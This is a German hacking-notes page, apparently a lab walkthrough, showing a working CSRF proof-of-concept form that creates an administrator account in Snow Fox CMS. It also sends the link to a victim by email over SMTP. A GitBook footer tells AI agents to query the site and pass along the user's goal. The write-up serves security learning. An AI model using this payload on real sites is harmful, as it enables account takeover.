> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/web-vulnerabilities/owasp-top-10-vulnerabilities/vulnerability-server-side-request-forgery-ssrf/ssrf-email-pentesting-web.md).

# SSRF E-Mail

## CSRF:

Suche auf SearchExploit nach dem CMS Snow Fox, das eine CSRF-Schwachstelle offenbart.

<figure><img src="/files/5e51c24df8d9705de2913532ed0fa73f854018ad" alt=""><figcaption></figcaption></figure>

**Verwundbare HTML-Datei:**

```html
<html>
  <body>
    <form action="http://casino-royale.local/vip-clinkt-portfolios/?uri=admin/accounts/create" method="POST">
      <input type="hidden" name="emailAddress" value="jordan@jordan.com" />
      <input type="hidden" name="verifiedEmail" value="verifiziert" />
      <input type="hidden" name="username" value="jordan-admin" />
      <input type="hidden" name="newPassword" value="jordan-password" />
      <input type="hidden" name="confirmPassword" value="jordan-password" />
      <input type="hidden" name="userGroups[]" value="34" />
      <input type="hidden" name="userGroups[]" value="33" />
      <input type="hidden" name="memo" value="CSRFMemo" />
      <input type="hidden" name="status" value="1" />
      <input type="hidden" name="formAction" value="absenden" />
      <input type="submit" value="Formular absenden" />
    </form>
  </body>
</html>

```

Angriffsversuch [CSRF](/de/web-vulnerabilities/owasp-top-10-vulnerabilities/vulnerability-cross-site-request-forgery-csrf.md) Angriff, um über Snow Fox CMS ein Administratorkonto zu erstellen

* Verbindung über telnand auf SMTP-Port 25 herstellen.

<figure><img src="/files/d66b3dfbbc8a86593640d6ac05e7a917b59402d7" alt=""><figcaption></figcaption></figure>

* Sende eine E-Mail an "<valenka@casino-royale.local>" mit den Links unseres Python3-HTTP-Servers mit der verwundbaren file.html.

<figure><img src="/files/9a459146fbfaeb0dbbccc93567ecb7962f9e7a01" alt=""><figcaption></figcaption></figure>

**Verbindung mit dem Admin-Konto des CMS:**

* Anmeldeversuch mit den neuen Zugangsdaten, der zur Erstellung eines Admin-Kontos im Snow Fox CMS führt.

<figure><img src="/files/6a343a4e5ca0c169b40519699244aa9e70e8eae6" alt=""><figcaption></figcaption></figure>

#### Nach Ausnutzung der CSRF-Schwachstelle wird im Snow Fox CMS ein Admin-Konto erstellt.

<figure><img src="/files/1be7fab85548b0b81a2f197f49b8a644adfd066f" alt=""><figcaption></figcaption></figure>

#### Identifizierung eines Hinweises in der Beschreibung eines Benutzers

In der Benutzerbeschreibung des CMS weist ein zusätzlicher Hinweis auf ein Verzeichnis hin, dem zu folgen ist.

<figure><img src="/files/b21ab3b5a26623ca4ffe1f2f14cf2ccb3ebe57a0" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/web-vulnerabilities/owasp-top-10-vulnerabilities/vulnerability-server-side-request-forgery-ssrf/ssrf-email-pentesting-web.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
